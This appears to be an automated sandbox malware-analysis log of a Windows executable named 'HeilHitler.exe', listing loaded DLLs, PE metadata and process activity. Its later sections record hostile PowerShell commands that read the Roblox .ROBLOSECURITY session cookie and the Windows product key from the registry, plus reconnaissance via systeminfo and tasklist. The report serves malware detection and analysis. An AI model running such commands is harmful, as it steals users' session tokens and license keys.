              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\HeilHitler.exe File opened: C:\Users\user\Desktop\pyvenv.cfg
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: HeilHitler.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: HeilHitler.exe Static file information: File size 6251402 > 1048576
Source: HeilHitler.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: HeilHitler.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: HeilHitler.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: HeilHitler.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: HeilHitler.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: HeilHitler.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: HeilHitler.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: HeilHitler.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: HeilHitler.exe
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.pdbhP source: powershell.exe, 00000026.00000002.1830812751.000002871BA75000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: HeilHitler.exe, 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: HeilHitler.exe, 00000000.00000003.1677234536.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2040274922.00007FFE13341000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_ctypes.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2039889853.00007FFE13301000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: HeilHitler.exe, 00000000.00000003.1677234536.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2040274922.00007FFE13341000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_sqlite3.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2038522061.00007FFE11EB1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2039368203.00007FFE12E11000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\python310.pdb source: HeilHitler.exe, 00000001.00000002.2036487623.00007FFDFB784000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000044.00000000.1908593127.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp, rar.exe.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: HeilHitler.exe, 00000001.00000002.2039054275.00007FFE126EC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: HeilHitler.exe, 00000001.00000002.2039054275.00007FFE126EC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\select.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2039626853.00007FFE130C1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: \0q.pdb source: powershell.exe, 00000026.00000002.1894620467.000002873381B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: HeilHitler.exe, 00000001.00000002.2033758431.00007FFDFAE6C000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: HeilHitler.exe, 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_ssl.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2037493230.00007FFE0EB41000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_socket.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2038127785.00007FFE11511000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2038813190.00007FFE11ED1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1q 5 Jul 2022built on: Thu Aug 18 20:15:42 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: HeilHitler.exe, 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2037789105.00007FFE10301000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.pdb source: powershell.exe, 00000026.00000002.1830812751.000002871BA75000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmp
              Source: HeilHitler.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: HeilHitler.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: HeilHitler.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: HeilHitler.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: HeilHitler.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: VCRUNTIME140.dll.0.dr | Static PE information: 0x8E79CD85 [Sat Sep 30 01:19:01 2045 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAF31940 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFAF31940
              Source: 0qdpbrpq.dll.49.dr | Static PE information: real checksum: 0x0 should be: 0xc052
              Source: libcrypto-1_1.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x1286c2
              Source: libffi-7.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x9bb1
              Source: python310.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x175084
              Source: _ctypes.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x1116d
              Source: unicodedata.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x49ec0
              Source: _bz2.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x11295
              Source: HeilHitler.exe | Static PE information: real checksum: 0x600079 should be: 0x603940
              Source: _ssl.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x13959
              Source: sqlite3.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x9855f
              Source: libssl-1_1.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x3a1a3
              Source: _queue.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0xa1bc
              Source: _socket.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x121bd
              Source: _decimal.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x1f136
              Source: _hashlib.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x14f2d
              Source: select.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0xe5dd
              Source: _lzma.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x2283b
              Source: _sqlite3.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x16d12
              Source: libffi-7.dll.0.dr | Static PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.dr | Static PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD692E4 push r10; retf 1_2_00007FFDFAD69350
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD6A2E5 push rsp; retf 1_2_00007FFDFAD6A2E6
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD66C21 push r10; ret 1_2_00007FFDFAD66C23
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD69C02 push rsp; retf 1_2_00007FFDFAD69C03
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD691A3 push rdi; iretd 1_2_00007FFDFAD691A5
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD6A164 push rsp; ret 1_2_00007FFDFAD6A165
              Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD68F53 push r12; iretd 1_2_00007FFDFAD68F6A
